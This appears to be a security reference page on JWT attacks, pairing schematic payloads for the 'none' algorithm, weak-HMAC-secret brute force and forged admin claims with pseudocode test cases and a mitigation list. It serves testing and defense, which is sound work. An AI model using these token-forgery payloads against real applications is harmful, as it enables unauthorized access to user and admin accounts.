JWT

JWT Attacks

Description

JWT (JSON Web Token) attacks exploit vulnerabilities in the implementation or usage of JWTs, allowing attackers to forge tokens, manipulate claims, or perform other malicious actions.

Example with Scenario

Scenario: A web application uses JWTs for user authentication. An attacker can exploit weak signing algorithms or insecure storage to forge tokens and gain unauthorized access.

Payloads and Test Cases

Payloads

1. None Algorithm Attack:

   Copy

   {
     "alg": "none"
   }

2. Brute Force HMAC Secret:

   Copy

   {
     "header": {
       "alg": "HS256",
       "typ": "JWT"
     },
     "payload": {
       "user": "admin"
     },
     "signature": "generated_signature"
   }

3. Claim Manipulation:

   Copy

   {
     "header": {
       "alg": "HS256",
       "typ": "JWT"
     },
     "payload": {
       "user": "attacker",
       "admin": true
     },
     "signature": "generated_signature"
   }

Test Cases

1. None Algorithm Attack:

   • Payload:

     Copy

     {
       "alg": "none"
     }

   • Test Case:

     Copy

     # Create a JWT with the 'none' algorithm
     jwtToken = createJWT({"alg": "none"}, {"user": "admin"}, "")
     # Send the token to the server
     sendJWTToServer(jwtToken)
     # Verify if the server accepts the token without validation
     checkAdminAccessGranted()

2. Brute Force HMAC Secret:

   • Payload:

     Copy

     {
       "header": {
         "alg": "HS256",
         "typ": "JWT"
       },
       "payload": {
         "user": "admin"
       },
       "signature": "generated_signature"
     }

   • Test Case:

     Copy

     # Generate a JWT with a known weak secret
     jwtToken = createJWT({"alg": "HS256"}, {"user": "admin"}, "weak_secret")
     # Send the token to the server
     sendJWTToServer(jwtToken)
     # Verify if the server accepts the token
     checkAdminAccessGranted()

3. Claim Manipulation:

   • Payload:

     Copy

     {
       "header": {
         "alg": "HS256",
         "typ": "JWT"
       },
       "payload": {
         "user": "attacker",
         "admin": true
       },
       "signature": "generated_signature"
     }

   • Test Case:

     Copy

     # Create a JWT with manipulated claims
     jwtToken = createJWT({"alg": "HS256"}, {"user": "attacker", "admin": True}, "valid_secret")
     # Send the token to the server
     sendJWTToServer(jwtToken)
     # Verify if the server grants admin access
     checkAdminAccessGranted()

Mitigation

1. Use Strong Secrets:

   • Use strong, random secrets for signing JWTs.

   • Avoid using weak or easily guessable secrets.

2. Validate Tokens Properly:

   • Always validate the token signature and claims.

   • Reject tokens with invalid or missing signatures.

3. Enforce Algorithm Constraints:

   • Enforce the use of secure algorithms (e.g., HS256, RS256).

   • Reject tokens with the 'none' algorithm or other weak algorithms.

4. Secure Token Storage:

   • Store JWTs securely on the client side (e.g., HTTP-only cookies).

   • Avoid storing tokens in local storage or other insecure places.

5. Implement Expiry and Revocation:

   • Implement token expiry and refresh mechanisms.

   • Provide a way to revoke tokens when necessary.